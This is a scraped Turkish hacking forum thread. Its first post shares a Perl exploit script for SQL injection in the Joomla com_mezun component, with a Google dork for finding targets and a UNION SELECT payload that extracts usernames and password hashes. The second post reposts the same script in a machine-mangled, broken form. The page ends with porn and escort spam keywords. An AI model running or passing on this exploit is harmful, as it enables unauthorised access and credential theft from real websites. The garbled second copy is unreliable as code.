KULLANICI ADI : ŞİFRE Şifremi Unuttum*

Anasayfa İLLEG4L BANK KREDİ SATIN AL İLLEG4LİZM RAP Sub Domain Bulucu Arama Yap Yeni Konular Bugünki Konular

Konuyu Oyla:
  • Derecelendirme: 0/5 - 0 oy
  • 1
  • 2
  • 3
  • 4
  • 5
# Joomla com_mezun Perl Exploit #
Konu : # Joomla com_mezun Perl Exploit # - 23.05.2015, 18:26
Mesaj: #1
#!/usr/bin/perl
#Exploit title: Joomla Component com_mezun SQL Injection exploit
#Google Dork: inurl:index.php?option=com_mezun
#Exploit Author: CoderSec.

system("color a");




print "*********************************************\n";
print "* Joomla Component com_mezun *\n";
print "* SQL Injection *\n";
print "* Coded by AnonGhost. *\n";
print "*********************************************\n";
sleep 1;
use LWP::UserAgent;
print "Enter the target --> ";
chomp(my $target=<STDIN>);
$code="/**/union/**/select/**/concat(username,0x3a,password),username,password,0x3a,0x3a,0x3a,0x3a,0x3a,0x3a,0x3a,0x3a/**/from/**/"+pre+"_users/;";
$agent = LWP::UserAgent->new() or die "[!] Error while processing";
$agent->agent('Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.12011');
$host= $target. "/index.php?option=com_mezun&task=edit&hidemainmenu=joomla&id=-9999999==".$code;
$ok = $agent->request(HTTP::Request->new(GET=>$host));
$ok1 = $ok->content; if ($ok1 =~/([0-9a-fA-F]{32})/){
print "[+] Password found --> $1\n$2\n";

sleep 1;
}
else
{
print "Password not found \n";
}
The-X4NG, üyesi illegalizm | Private illegal Topluluk - Hack forum,Warez Scriptler forumlarına 10.05.2015 tarihinde katılmıştır.

WWW Alıntı ile Cevapla
Konu : # Joomla com_mezun Perl Exploit # - 08.10.2015, 01:10
Mesaj: #2
Kod:
#! / usr / bin / perl
#Exploit Title: Joomla Component SQL Injection exploits com_mez
#google Dork: inurl: index.php? Option = com_mez the
#Exploit Author: codersec.

system ("COLOR");


                                                              

print "********************************************* \ n" ;
print "* Joomla Component com_mez the * \ n";
print "SQL Injection * * \ n";
print "Coded by anonghost *. * \ n";
print "********************************************* \ n" ;
sleep 1;
use LWP :: UserAgent;
print "Enter the target ->";
chomp (my $ target = <STDIN>);
$code="/**/union/**/select/**/concat(username,0x3a,password),username,password,0x3a,0x3a,0x3a,0x3a,0x3a,0x3a,0x3a,0x3a/**/from/**/"+pre+"_users/;";
$ agent = LWP :: useragent-> new () or die "[!] Error while processing";
$ agent-> agent ("Mozilla / 5.0 (Windows NT 6.1; WOW64; rv: 7.0.1) Gecko / 20100101 Firefox / 7.0.12011 ');
$ host = $ target. "In /index.php?option=com_mezun&task=edit&hidemainmenu=joomla&id=-9999999==".$co;
$ ok = $ agent-> request (HTTP :: Request-> new (GET => $ host));
$ ok1 = $ oxidized> content; if ($ ok1 = ~ / ([0-9a-fA-F] {32}) /) {
print "[+] Password found -> $ 1 \ n $ 2 \ n";

sleep 1;
}
else
{
print "Password not found \ n";
}



[youtube]L1kId3v8pLQ[/youtube]

(Son Düzenleme: 08.10.2015, 01:32, Düzenleyen: Cer0L. Sebep: n/a )
WWW Alıntı ile Cevapla


Hızlı Menü:


Konuyu Okuyanlar: 1 Ziyaretçi
hd porno antalya escort türk ifşa porno izle türk ifşa porno samsun escort izmir escort ataşehir escort türk ifşa hd porno